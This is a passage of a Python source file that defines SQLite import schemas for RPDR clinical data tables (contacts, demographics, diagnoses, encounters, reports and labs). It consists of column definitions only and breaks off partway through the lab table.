TableColumn = namedtuple('TableColumn','name type primaryKey index unique notNull foreignKeyRef dateReformat timelineDate timelineBlurb')
# define RPDR csv dialect and some standards
CsvDialect = namedtuple('CsvDialect','delimiter doublequote escapechar lineterminator quotechar quoting skipinitialspace strict')
StandardCsvDialect = CsvDialect(
delimiter = '|',
doublequote = True,
escapechar = None,
lineterminator = '\r\n',
quotechar = '',
quoting = QUOTE_NONE,
skipinitialspace = True,
strict = False
)
# define RPDR table
Table = namedtuple('Table', 'name fileExt columns csvDialect freeTextReportInLastColumn useInTimeline')
#--------------------------------------------------------------------------------------------
# define Car RPDR table
Car = Table(
name = 'Car',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = True,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Number",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MID",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Date_Time",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y %I:%M:%S %p', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Report_Description",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Report_Status",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Text",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Con RPDR table
Con = Table(
name = 'Con',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = False,
useInTimeline = False,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = True,
index = False,
unique = True,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Last_Name",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "First_Name",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Middle_Name",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Address1",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Address2",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "City",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "State",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Zip",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Country",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Home_Phone",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Day_Phone",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "SSN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "VIP",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Previous_Name",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Patient_ID_List",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Insurance_1",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Insurance_2",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Insurance_3",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Primary_Care_Physician",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Resident_Primary_Care_Physician",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Dem RPDR table
Dem = Table(
name = 'Dem',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = False,
useInTimeline = False,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = True,
index = False,
unique = True,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Gender",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Date_of_Birth",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Age",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Language",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Race",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Marital_status",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Religion",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Is_a_veteran",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Zip_code",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Country",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Vital_status",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Date_Of_Death",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y', reformat=SQLITE_DATE_FORMAT )
)
]
)
#--------------------------------------------------------------------------------------------
# define Dia RPDR table
Dia = Table(
name = 'Dia',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = False,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Date",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Diagnosis_Name",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Code_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Code",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Diagnosis_Flag",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Provider",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Clinic",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Hospital",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Inpatient_Outpatient",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Encounter_number",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Dis RPDR table
Dis = Table(
name = 'Dis',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = True,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Number",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MID",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Date_Time",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y %I:%M:%S %p', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Report_Description",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Report_Status",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Text",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Dpt RPDR table
Dpt = Table(
name = 'Dpt',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = True,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Number",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MID",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Date_Time",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y %I:%M:%S %p', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Report_Description",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Report_Status",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Text",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Enc RPDR table
Enc = Table(
name = 'Enc',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = False,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Encounter_number",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Encounter_Status",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Hospital",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Inpatient_Outpatient",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Service_Line",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Attending_MD",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Admit_Date",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Discharge_Date",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Clinic_Name",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Admit_Source",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Discharge_Disposition",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Payor",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Admitting_Diagnosis",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Principle_Diagnosis",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Diagnosis_1",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Diagnosis_2",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Diagnosis_3",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Diagnosis_4",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Diagnosis_5",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Diagnosis_6",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Diagnosis_7",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Diagnosis_8",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Diagnosis_9",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Diagnosis_10",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "DRG",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Patient_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Referrer_Discipline",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define End RPDR table
End = Table(
name = 'End',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = True,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Number",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MID",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Date_Time",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y %I:%M:%S %p', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Report_Description",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Report_Status",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Text",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Lab RPDR table
Lab = Table(
name = 'Lab',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = False,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Seq_Date_Time",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y %H:%M', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Group_Id",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Loinc_Code",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Test_Id",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Test_Description",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Result",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Result_Text",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Abnormal_Flag",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Reference_Units",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Reference_Range",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Toxic_Range",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Specimen_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Specimen_Text",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Correction_Flag",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Test_Status",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Ordering_Doc_Name",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
